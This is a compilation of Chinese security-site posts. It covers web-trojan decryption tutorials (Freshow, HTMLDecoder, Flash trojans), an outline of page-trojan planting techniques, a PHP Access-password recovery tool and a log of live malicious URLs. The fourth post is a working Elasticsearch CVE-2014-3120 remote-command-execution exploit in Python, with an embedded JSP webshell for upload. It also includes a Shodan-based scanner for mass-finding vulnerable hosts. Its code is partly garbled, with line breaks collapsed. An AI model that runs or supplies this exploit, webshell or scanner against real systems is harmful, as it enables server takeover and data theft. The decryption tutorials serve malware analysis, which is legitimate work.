网马解密中级篇(Freshow工具使用方法)漏洞预警

“Johnney”通过精心收集，向本站投稿了5篇网马解密中级篇(Freshow工具使用方法)漏洞预警，下面是小编为大家整理后的网马解密中级篇(Freshow工具使用方法)漏洞预警，供大家参考借鉴，希望可以帮助到有需要的朋友。

篇1：网马解密中级篇(Freshow工具使用方法)漏洞预警

网马解密中级篇(Freshow工具使用方法)

今天主要讲解的内容是Freshow工具的使用方法，工欲善其事,必先利其器，首先要学会如何使用解密工具，才能一步一步进入解密的殿堂，揭开网马解密的神秘面纱，好了，我们先来认识认识我们用到工具(Freshow)，截图如下

1.URL：要解密的网址地址

2.Check：用来获取要解密网址的源代码(此工具要在联网状态下使用)

3.上操作区域：获取到的网站源代码在此处显示

4.C：清除代码，用来清除上操作区域和下操作区域的代码

5.P：是复制代码

6.Filter：过滤网页源代码中的js、iframe、script链接

7.Decoder：解密按钮，用来解密加密的网页源代码

8.过滤选项：

Qeye：过滤网页源代码中潜在的恶意链接，如：iframe、script结果会显示在收集区域；

Connect：连接字符串，如‘a+b’，使其变为：ab；

Nuls：过滤空字符串，使得脚本更容易阅读；

Replace：替换字符串；

Reverse：逆转字符，一些特殊的脚本采用这种方式。

解密选项：

9.Esc：可以转换%、%u、x等形式的转义字符，x可以再操作异或，如果知道确切的值，就在附加区域

里输入它，或者使用枚举异或enumXOR，会自动处理并返回结果 ；

ASCII：可以转换“1,2,3”形式的ASC码，分割符可以覆盖；

US-ASCII ：代码类似汉字，且代码中包含有：

c?/>

Alpha2：这个算法针对在Replayer的漏洞利用上，首先转换到x形式，因为可能会经过异或操作；

enumXOR：对十六进制的数据进行枚举异或，并返回结果；

Base64：这种加密方式很少见，加密特征大小写字母及数字混排，末尾可能包含等号；

Winwebmail:网马加密代码中有类似：document.write(unencode(webmm,3422));代码(至今未见过此类加密方式，这个不确定)

10.密钥 (目前主要ie7.0漏洞的解密需要密钥)

11.UP:将下操作区域的内容翻转到上操作区域进行二次解密

12.上选择按钮：对上操作区域代码进行清空或复制

13.下选择按钮：对下操作区域代码进行清空或复制

14.下操作区域：解密出网马结果显示在此处

15.收集区域：由Qeye筛选出的恶意链接被罗列在这里，可以通过上移、下移、删除、全选等操作。当选

中其中一个链接时，自动处理为新的URL，这时可以check得到新的源代码，显示在上操作区域，可继续

解密

16.ALL: 勾选所有收集区域的地址

17.Del：删除不需要的链接

18.上移按钮：将恶意链接地址进行上移操作

19.下移按钮：将恶意链接地址进行下移操作

20.Log：自动将选择项复制到剪切板并做一定的格式化处理，方便直接在论坛或其他地方与他人共享分

析结果

21.Download：将选择的网马地址复制到剪切板，并下载相应的网马(例如：迅雷、flashget开启状态下

，并设置了监视相应的文件类型，此时点击download按钮就会调出默认的下载工具下载网马。)

22.Obj：目标插入区域，将最终解密出来的网马地址，复制到obj区域，并按Insert插入，它将会被自动

插入到之前选中的链接后，作为子级

23.Insert：插入网马链接地址

24.State：连接状态，可通过连接状态来判断网址是否失效。

一个完整的freshow日志，其中红色部分均为真实的网马地址：

注意：该网站有多处被挂马，内容都相同，只解出其中一个即可。

Code:

Log is generated by FreShow.

[wide]qianshou.tfol.com

[script]qianshou.tfol.com/Js/highslide-with-html.js

[script]3b3.org/c.js

[frame]4t6nhh.6600.org/a/a100.htm

[frame]4t6nhh.6600.org/a/cnzz.htm

[frame]4t6nhh.6600.org/a/kk.htm

[script]4t6nhh.6600.org/a/14.js

[object]xin89221.com/love/windoss.css

[frame]4t6nhh.6600.org/a/flash.htm

[frame]4t6nhh.6600.org/a/iqq.html

[object]4t6nhh.6600.org/a/i16.swf

[object]4t6nhh.6600.org/a/i28.swf

[object]4t6nhh.6600.org/a/i45.swf

[object]4t6nhh.6600.org/a/i47.swf

[object]4t6nhh.6600.org/a/i64.swf

[object]4t6nhh.6600.org/a/i115.swf

[frame]4t6nhh.6600.org/a/fqq.html

[object]4t6nhh.6600.org/a/f16.swf

[object]4t6nhh.6600.org/a/f28.swf

[object]4t6nhh.6600.org/a/f45.swf

[object]4t6nhh.6600.org/a/f47.swf

[object]4t6nhh.6600.org/a/f64.swf

[object]4t6nhh.6600.org/a/f115.swf

[frame]4t6nhh.6600.org/a/xx.htm

[script]4t6nhh.6600.org/a/xx.js

[object]xin89221.com/love/windoss.css

[frame]4t6nhh.6600.org/a/office.htm

[script]4t6nhh.6600.org/a/office.js

[object]xin89221.com/love/windoss.css

[frame]4t6nhh.6600.org/a/02.htm

[script]4t6nhh.6600.org/a/set.js

[object]xin89221.com/love/windoss.css

[script]4t6nhh.6600.org/a/reee.js

[frame]4t6nhh.6600.org/a/real.htm

[script]4t6nhh.6600.org/a/real.js

[object]xin89221.com/love/windoss.css

[frame]4t6nhh.6600.org/a/real.html

[script]4t6nhh.6600.org/a/re11.js

[object]xin89221.com/love/windoss.css

[script]4t6nhh.6600.org/a/rkkk.js

[frame]4t6nhh.6600.org/a/lz.htm

[script]4t6nhh.6600.org/a/lz.js

[object]xin89221.com/love/windoss.css

[frame]4t6nhh.6600.org/a/bf.htm

[script]4t6nhh.6600.org/a/bf1.js

[script]4t6nhh.6600.org/a/bf.js

[object]xin89221.com/love/windoss.css

篇2：网马解密初级篇漏洞预警

网马解密初级篇

一. 网页挂马的概念：

网页挂马是指：在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码，这些恶意代码主要是一些包括IE等漏洞利用代码，用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则会执行恶意代码程序，进行 等危险操作，

二.常见的网页挂马方式：

框架挂马：

2. js文件挂马:

首先将以下代码：

document.write(“”);

保存为xxx.js，

则JS挂马代码为:

3. js变形加密

muma.txt可改成任意后缀

4. flash木马

网页木马地址 插入木马地址 width=10 height=10“, ”GET“ 宽度和高度，方式后面的照添，更改木马地址就可以了。

5. 不点出现链接的木马

页面要显示的内容

6.隐蔽挂马：

top.document.body.innerHTML=top.document.body.innerHTML+'rn'[/url]

7.css中挂马：

body {background-image:url('javascript.:document.write(”“)')}

8.Java挂马：

三.常见网马所利用的漏洞判断方式：

1. 根据恶意网址名称来判断漏洞

2.根据CLSID判断漏洞：

常见网马解密工具：

1.Freshow工具(作者：jimmyleo大牛)

工具简介(摘自freshow帮助文档)：Freshow是一款脚本解密的工具，其开发的初衷是减少机械操作和简化处理步骤，使您能专注于脚本本身，

一般解密方法有手动和工具两种，Freshow尽量使得工作在一个工具下完成，当然它还不是那么成熟，您可以搭配其他工具来完成工作。Freshow目前具备过滤和解密功能模块能满足常见加密分析所需的操作。它的性能和稳定性还有最终的成果取决于您对Freshow的熟悉程度、对脚本知识的了解程度以及分析程度。

2.HTMLDecoder(作者：祥子大牛)

工具简介：这是一款自动解密的工具，功能非常强大，可惜俺对它研究还是，不是很深。只用过它解密过flash网马和pdf网马。

3.malzilla又称神器

工具简介：这个工具很好很强大，freshow无法解出的网马，使用这个工具基本都可以解出。

4.MDecoder(麦田大牛)

工具简介（摘自麦田的博客）：1，Freshow的模仿者，使用WIN32汇编编写。

2，支持对网马中swf和exe的查找（不完善）。

3，支持网马识别，可通过修改classid.ini来扩充特征。

暂时先介绍这么多，还有很多辅助类的工具，后续会一一介绍给大家

篇3：网马解密高级篇(SWF解密)漏洞预警

网马解密高级篇(SWF解密)

一、Flash网马简介 ：

flash网马是利用Adobe Flash Player播放器严重安全漏洞， 攻击者可以通过精心设计的特殊SWF文件实施攻击，浏览这些特殊构造的SWF文件，会运行攻击者设定的任意代码。

二、Flash网马解密方法：

今天我们主要来讲解如何利用(HTMLDecoder)工具，对flash网马进行解密。此工具由小祥大牛开发的一款自动网马解密工具，内附有flash网马解密功能，在这里宣传一下小祥大牛哈。工具下载见附件，本次讲解不提供具体的swf文件下载，防止一些网友不明，胡乱运行导致系统中毒。主要讲解对于flash网马如何解密的方法

好接下来我们讲解如何使用HTMLDecoder工具，进行flash网马解密，详见截图：

在这里主要讲解如何利用这个工具，来解密swf网马，此工具其它使用方法，会在今后的网马教学中进行讲解，

上述截图中红色框标出内容为在解密swf网马时，需要选择的相应的A>PDF/CWS/Zlib Extractor解密选项。在后面的pdf网马解密也是选择此项。

点击开始按钮弹出上述截图页面，此工具包含swf和pdf解密功能，简单介绍一下使用方法，点击浏览按钮找到要解密的swf或pdf文件，在输入文件类型选择相应的文件类型，默认为pdf，根据文件类型的不同，相应的加载或解压按钮也不相同，点击加载按钮，程序会自动结构拆分、找到其中的数据流，点击解压按钮后，解压数据浏览即会显示出网马下载地址。

定位到要解密的swf网马

在这里要注意两个细节：首先要选择输入文件类型为swf，因为要解密的是swf网马，选择此项后，默认的加载（pdf）按钮会变为解压(cws)，这时我们点击解压(cws)按钮即可。

最终的解密结果在解压数据预览里显示，详见上图。

篇4：elasticsearch 漏洞利用工具套装漏洞预警

ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎，设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。支持通过HTTP使用JSON进行数据索引。

请勿用于非法用途，只供漏洞研究之用

因该脚本造成法律问题，作者概不负责，如果违反相关规定，请通知管理员删除该文章

exp:post提交 支持文件上传功能

exp.py

#!/usr/bin/env python# by heshang ha.cker@me.com# -*- coding: utf-8 -*-importhttplibimporturllib,urllib2importsimplejsonimportstringimportsysfromoptparseimportOptionParserprint'Elasticsearch ExpLoit By Heshang'print'                         -06-23'options =OptionParser(usage='%prog ip [port] [command]',description='elasticsearch command exec exploit(CVE-2014-3120)')options.add_option('-p','--port',type='int',default='9200',help='The elasticsearch port (default:9200)')options.add_option('-c','--cmd',type='str',default='whoami',help='command to test (default:whoami)')options.add_option('-P','--path',type='str',default='',help='Upload file's path')defpost(ip,port,exp):ip=ip    port=port    path=''exp=exp    data = {”size“:1,”query“: {”filtered“: {”query“: {”match_all“: {}}        }    },”script_fields“: {”exp“: {”script“:exp        }    }    }    data = simplejson.dumps(data)headers = {”User-agent“:”Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/0115 Firefox/3.6)“,”Accept“:”ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8“,”Content-Type“:”application/json; charset=utf-8“,”Connection“:”keep-alive“}conn = httplib.HTTPConnection('%s'% ip+':'+'%d'% port)conn.request('POST','/_search?source',data,headers)result = conn.getresponse.read()returnresultdefexec_command(ip,port,cmd):ip=ip    port=port    cmd=cmd    exp ='import java.util.*;nimport java.io.*;nString str = ”“;BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(”'+cmd+'“).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+”|“);}sb.toString();'rs = post(ip,port,exp)returnrsdefsave_file(ip,port,path):ip=ip    port=port    path=path    upload='testtesttest'#upload='<%@page import=”java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*“%><%!String Pwd=”xxxxx“;String cs=”UTF-8“;String EC(String s)throws Exception{return new String(s.getBytes(”ISO-8859-1“),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split(”rn“);Class.forName(x[0].trim());if(x[1].indexOf(”jdbc:oracle“)!=-1){return DriverManager.getConnection(x[1].trim()+”:“+x[4],x[2].equalsIgnoreCase(”[/null]“)?”“:x[2],x[3].equalsIgnoreCase(”[/null]“)?”“:x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase(”[/null]“)?”“:x[2],x[3].equalsIgnoreCase(”[/null]“)?”“:x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i“+”|“).getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write((”|“+”<-“).getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h=”0123456789ABCDEF“;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i5?x[5]:x[4]:null,”%“,new String[]{”TABLE“});while(r.next()){sb.append(r.getString(”TABLE_NAME“)+”t“);}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split(”rn“);Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery(”select * from “+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+” (“+d.getColumnTypeName(i)+”)t“);}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf(”--f:“)!=-1?q.substring(0,q.indexOf(”--f:“)):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i <=n; i++){sb.append(d.getColumnName(i)+”t|t“);}sb.append(”rn“);if(q.indexOf(”--f:“)!=-1){File file=new File(p);if(q.indexOf(”-to:“)==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf(”-to:“)!=-1?p.trim():p+q.substring(q.indexOf(”--f:“)+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i<=n;i++){if(q.indexOf(”--f:“)!=-1){bw.write(r.getObject(i)+”“+”t“);bw.flush();}else{sb.append(r.getObject(i)+”“+”t|t“);}}if(bw!=null){bw.newLine();}sb.append(”rn“);}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append(”Resultt|trn“);try{m.executeUpdate(q);sb.append(”Execute Successfully!t|trn“);}catch(Exception ee){sb.append(ee.toString()+”t|trn“);}}m.close();c.close();}%><%cs=request.getParameter(”z0“)!=null?request.getParameter(”z0“)+”“:cs;response.setContentType(”text/html“);response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer(”“);try{String Z=EC(request.getParameter(Pwd)+”“);String z1=EC(request.getParameter(”z1“)+”“);String z2=EC(request.getParameter(”z2“)+”“);sb.append(”->“+”|“);String s=request.getSession().getServletContext().getRealPath(”/“);if(Z.equals(”A“)){sb.append(s+”t“);if(!s.substring(0,1).equals(”/“)){AA(sb);}}else if(Z.equals(”B“)){BB(z1,sb);}else if(Z.equals(”C“)){String l=”“;BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+”rn“);}br.close();}else if(Z.equals(”D“)){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append(”1“);}else if(Z.equals(”E“)){EE(z1);sb.append(”1“);}else if(Z.equals(”F“)){FF(z1,response);}else if(Z.equals(”G“)){GG(z1,z2);sb.append(”1“);}else if(Z.equals(”H“)){HH(z1,z2);sb.append(”1“);}else if(Z.equals(”I“)){II(z1,z2);sb.append(”1“);}else if(Z.equals(”J“)){JJ(z1);sb.append(”1“);}else if(Z.equals(”K“)){KK(z1,z2);sb.append(”1“);}else if(Z.equals(”L“)){LL(z1,z2);sb.append(”1“);}else if(Z.equals(”M“)){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals(”N“)){NN(z1,sb);}else if(Z.equals(”O“)){OO(z1,sb);}else if(Z.equals(”P“)){PP(z1,sb);}else if(Z.equals(”Q“)){QQ(cs,z1,z2,sb,z2.indexOf(”-to:“)!=-1?z2.substring(z2.indexOf(”-to:“)+4,z2.length()):s.replaceAll(”\\“,”/“)+”images/“);}}catch(Exception e){sb.append(”ERROR“+”:// “+e.toString());}sb.append(”|“+”<-“);out.print(sb.toString());%>'exp='import java.util.*;nimport java.io.*;nFile f = new File(”'+path+'“);if(f.exists()){”exists“.toString();}BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),”UTF-8“));bw.write(”'+upload+'“);bw.flush();bw.close();if(f.exists()){”success“.toString();}'rs = post(ip,port,exp)returnrsdefmain():opts,args = options.parse_args()iflen(args) <1:options.print_help()returnifopts.path !=”“:        exp=save_file(args[0],opts.port,opts.path)exp=simplejson.loads(exp)exp=exp['hits']['hits'][0]['fields']['exp']printexpelifopts.path ==”“:exp=exec_command(args[0],opts.port,opts.cmd)exp=simplejson.loads(exp)exp=exp['hits']['hits'][0]['fields']['exp']s='%s'%exp        s=s.split('|')foriins:printi#.decode(”unicode_escape“)if__name__ =='__main__':main()

check.py需要安装shodan模块和shodan api

#!/usr/bin/env python# -*- coding: utf-8 -*-#by ha.cker@me.comimporttimeimportshodanimportsysimporturllibimportsimplejsonimportsocketprint'******************************************************'print'* Elasticsearch vul found Tool                       *'print'* Write by ha.cker@me.com                            *'print'* U can use shodan api to search the vul host        *'print'******************************************************'# ConfigurationAPI_KEY =”“# apidefcheck(ip):ip=ip    socket.setdefaulttimeout(3)try:rs = urllib.urlopen(''+'%s'%ip +':9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString(31415926)%22}}}}')rs = rs.read()rs = simplejson.loads(rs)except:passtry:fortinrs['hits']['hits'][0]['fields']['t']:t=texcept:passelse:print'found vul host : %s'% ipdefmain():try:#Setupthe api            api = shodan.Shodan(API_KEY)query ='you Know, for'foriinrange(1,100):page = itry:result = api.search(query,page)exceptException,e:print'Error: %s and sleep 10 s'% e                    time.sleep(10)passelse:forserviceinresult['matches']:ip = service['ip_str']ip=str(ip)check(ip)#Loopthrough the matchesandprinteach IPexceptException,e:print'Error: %s and sleep 10 s'% eprinti            sys.exit(1)if__name__ =='__main__':main()

篇5：Access在线解密[PHP源码]漏洞预警

只能解密2000或者97的MDB文件

/*site:www.t00ls.net  */

/*如果 本信息  */

/*by:7jdg      QQ:7259561 */

$file=$_FILES['uploadfile']['tmp_name'];

$oldname =$_FILES['uploadfile']['name'];

$ext     =strtolower(substr(strrchr($oldname, '.'), 1));

if ($file)

{

if ($ext != ”mdb“)

{

echo ”你传的是MDB文件吗?大学生是你这样吗?

“;

echo ”您知道啥是MDB么?t“ . $oldname . ”是MDB后缀吗?后缀是啥知道不?“;

}

else

{

//为Access2000异或的源码

$PassSource2k=array(0xa1,0xec,0x7a,0x9c,0xe1,0x28,0x34,0x8a,0x73,0x7b,0xd2,0xdf,0x50);

//Access97的异或源码

$PassSource97=array(0x86,0xfb,0xec,0x37,0x5d,0x44,0x9c,0xfa,0xc6,0x5e,0x28,0xe6,0x13);

//$file = 'Level5555.mdb';

$ver = file_get_contents($file,1,null,0x14,1);//版本

$ver = hexdec(bin2hex($ver));

$EncrypFlag= file_get_contents($file,1,null,0x62,1);//加密标志

$EncrypFlag = hexdec(bin2hex($EncrypFlag));

for($i=66;$i < 92; $i++){

$temp = file_get_contents($file,1,null,$i,1);//加密标志

$pass[].=hexdec(bin2hex($temp));

}

if ($ver < 1){

$MdbVersion=”Access 97“;

if(($pass[0] ^ $PassSource97[0])==0)

$MdbPassword=”密码为空!“;

else{

$MdbPassword=”“;

for($i=0;$i < 13; $i++)

$MdbPassword .=chr($pass[$i*2] ^ $PassSource2k[$i]);

}

}else{

$MdbVersion=”Access 2000 or 2002“;

for($i=0;$i < 13; $i++){

if(($i % 2)==0)

$t1 = chr(0x13 ^ $EncrypFlag ^ $pass[$i*2] ^ $PassSource2k[$i]);

else

$t1 = chr($pass[$i*2] ^ $PassSource2k[$i]);

$MdbPassword .=$t1;

}

}

if(ord($MdbPassword[1]) < 0x20 || ord($MdbPassword[1]) > 0x7e)

$MdbPassword=”密码为空！“;

}

}

?>

Access在线解密

MDB文件:

Access版本: 

文件名: 

密码: 

---------------------------------------------------------------------------------------------------------

选择一个本地的mdb文件,上传解密,如发现密码不完整或者解密不出的问题,请随时联系我

---------------------------------------------------------------------------------------------------------

【网马解密中级篇(Freshow工具使用方法)漏洞预警】相关文章：

1.网马解密初级篇漏洞预警